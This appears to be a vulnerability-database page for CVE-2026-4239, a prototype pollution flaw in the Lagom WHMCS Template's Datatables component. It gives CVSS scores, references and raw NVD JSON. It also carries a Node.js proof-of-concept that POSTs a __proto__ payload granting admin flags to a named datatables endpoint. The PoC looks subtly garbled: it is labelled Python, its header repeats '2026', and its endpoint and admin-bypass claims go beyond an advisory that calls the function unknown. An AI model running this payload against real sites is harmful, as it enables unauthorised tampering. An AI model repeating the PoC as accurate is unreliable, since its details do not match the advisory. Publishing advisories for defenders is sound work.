CVE-2026-4239

Description

A vulnerability was found in Lagom WHMCS Template up to 2.3.7. Impacted is an unknown function of the component Datatables. The manipulation results in improperly controlled modification of object prototype attributes. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Lagom WHMCS Template <= 2.3.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-2026-4239 Prototype Pollution PoC
// Target: Lagom WHMCS Template <= 2.3.7
// Component: Datatables

const http = require('http');

// PoC for Prototype Pollution in Lagom WHMCS Template
function exploitPrototypePollution(targetUrl) {
    const payload = {
        // Prototype pollution payload targeting Datatables component
        "__proto__": {
            "isAdmin": true,
            "role": "admin",
            "bypassAuth": true
        },
        // Alternative payload format
        "constructor": {
            "prototype": {
                "adminAccess": true
            }
        }
    };

    const postData = JSON.stringify(payload);
    
    const options = {
        hostname: targetUrl,
        port: 80,
        path: '/modules/templates/lagom/includes/datatables/api',
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'Content-Length': Buffer.byteLength(postData),
            'User-Agent': 'Mozilla/5.0'
        }
    };

    const req = http.request(options, (res) => {
        let data = '';
        res.on('data', (chunk) => { data += chunk; });
        res.on('end', () => {
            console.log('Response:', data);
            console.log('Prototype pollution attempt completed');
        });
    });

    req.write(postData);
    req.end();
}

// Usage example
// exploitPrototypePollution('vulnerable-site.com');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4239
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4239
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4239/
[4] VulDB https://vuldb.com/cve/CVE-2026-4239
[5] https://github.com/devsamuelsantiago/lagom-prototype-pollution-poc/
[6] https://github.com/devsamuelsantiago/lagom-prototype-pollution-poc/blob/main/lagom-prototype-pollution-poc.js
[7] https://vuldb.com/?ctiid.351181
[8] https://vuldb.com/?id.351181
[9] https://vuldb.com/?submit.771350

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4239", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:18.703", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Lagom WHMCS Template up to 2.3.7. Impacted is an unknown function of the component Datatables. The manipulation results in improperly controlled modification of object prototype attributes. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue encontrada en la plantilla Lagom WHMCS hasta la versión 2.3.7. Afectada es una función desconocida del componente Datatables. La manipulación resulta en una modificación de atributos de prototipo de objeto controlada de forma inadecuada. Es posible lanzar el ataque de forma remota. El exploit ha sido hecho público y podría ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-1321"}]}], "references": [{"url": "https://github.com/devsamuelsantiago/lagom-prototype-pollution-poc/", "source": "[email protected]"}, {"url": "https://github.com/devsamuelsantiago/lagom-prototype-pollution-poc/blob/main/lagom-prototype-pollution-poc.js", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351181", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351181", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771350", "source": "[email protected]"}]}}